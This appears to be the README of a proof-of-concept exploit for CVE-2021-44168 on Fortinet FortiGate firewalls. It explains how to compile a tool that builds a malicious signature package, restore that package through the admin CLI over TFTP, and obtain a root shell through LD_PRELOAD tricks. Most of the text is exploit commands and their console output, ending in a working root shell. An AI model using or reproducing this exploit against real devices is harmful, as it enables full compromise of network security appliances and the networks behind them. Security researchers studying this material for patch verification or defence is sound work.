Exploit CVE-2021-44168 to drop a shell on a Fortigate firewall and enable its access via LD_PRELOAD
tricks that execute when running some of Fortigate's CLI commands. You get a root shell.
Compile:
gcc -o gen_src-vis_pkg_file gen_src-vis_pkg_file.c -lz
Run:
% ./gen_src-vis_pkg_file
./gen_src-vis_pkg_file [ -t | -p ] filename.img
-t Generate test package, or
-p Generate pwn package.
filename.img Write to this file.
Test mode drops a file called pwned.txt
to the root of the Fortigate's filesysem. Create a test package like so:
% ./gen_src-vis_pkg_file -t test.img
[+] Generaing TEST package
[+] Reading test.tar for insertion into package file test.img
[+] Compressing test.tar (10240 bytes)
[+] Compressed size: 115
[+] Build pkg_header
[+] pkg_header crc32: 0x16a384f1
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data crc32: 0xe097e419
[+] obj_header crc32: 0xabdfc3cb
[+] Write pkg_header + obj_header + obj_data > test.img
[+] All done. So long and thanks for all the fish!
Exploit mode creates a payload package that drops a shell onto the FortiGate and enables it via LD_PRELOAD
tricks. To generate the exploit package, run the exploit like so:
% ./gen_src-vis_pkg_file -p pwn.img
[+] Generaing EXPLOIT package
[+] Reading pwn.tar for insertion into package file pwn.img
[+] Compressing pwn.tar (16465920 bytes)
[+] Compressed size: 6843825
[+] Build pkg_header
[+] pkg_header crc32: 0xd657d879
[+] Build obj_header
[+] Using CIDB for obj_type
[+] obj_data crc32: 0xf373554b
[+] obj_header crc32: 0x3a7fdcd7
[+] Write pkg_header + obj_header + obj_data > pwn.img
[+] All done. So long and thanks for all the fish!
From the FortiGate admin CLI:
FortiGate # execute restore src-vis tftp pwn.img 192.168.100.1
This operation will overwrite the current source visibility signatures!
Do you want to continue? (y/n)y
Please wait...
Connect to tftp server 192.168.100.1 ...
######
Get source visibility signatures from tftp server OK.
upd_manual_cid[255]-Updating src-vis plugin
doInstallUpdatePackage[981]-Full obj found for CIDB000
doInstallUpdatePackage[991]-Updating obj CIDB
installUpdateObject[323]-Step 1:Unpack obj 29, Total=1, cur=0
installUpdateObject[352]-Step 2:Prepare temp file for obj 29
installUpdObjRest[637]-Step 5:Backup /etc/cid.tar.gz->/tmp/update.backup
installUpdObjRest[651]-Step 6:Copy new object /tmp/updPiMCON->/etc/cid.tar.gz
installUpdObjRest[731]-Step 7:Validate object
installUpdObjRest[755]-Step 8:Re-initialize using new obj file
installUpdObjRest[767]-Step 9:Delete backup /tmp/update.backup
cid svr 13 req 4
__update_status[1181]-CIDB000 installed successfully
upd_status_save_status[114]-try to save on status file
upd_status_save_status[179]-Wrote status file
upd_manual_cid[284]-Update successful
./../../../../../data2/bfbin/rdate: Cannot create symlink to '/data2/bfbin/busybox'Error exit delayed from previous errorsupd_cfg_extract_unpacked2
upd_cfg_extract_cid_db_version[554]-version=06000000CIDB00000-00000.00000-0101010000
cid could not install sigs: version failed
FortiGate #
At this point you'll have a shell that accessible via LD_PRELOAD
on CLI commands that shell out to Linux. One such way to activate the newly dropped shell:
# fnsysctl ls
/ #
/ # export PATH=/data2/bfbin:/bin
/ # uname -a
Linux FortiGate 3.2.16 #2 SMP Thu Mar 28 02:54:46 UTC 2019 x86_64 GNU/Linux
TBD. Read the code for now.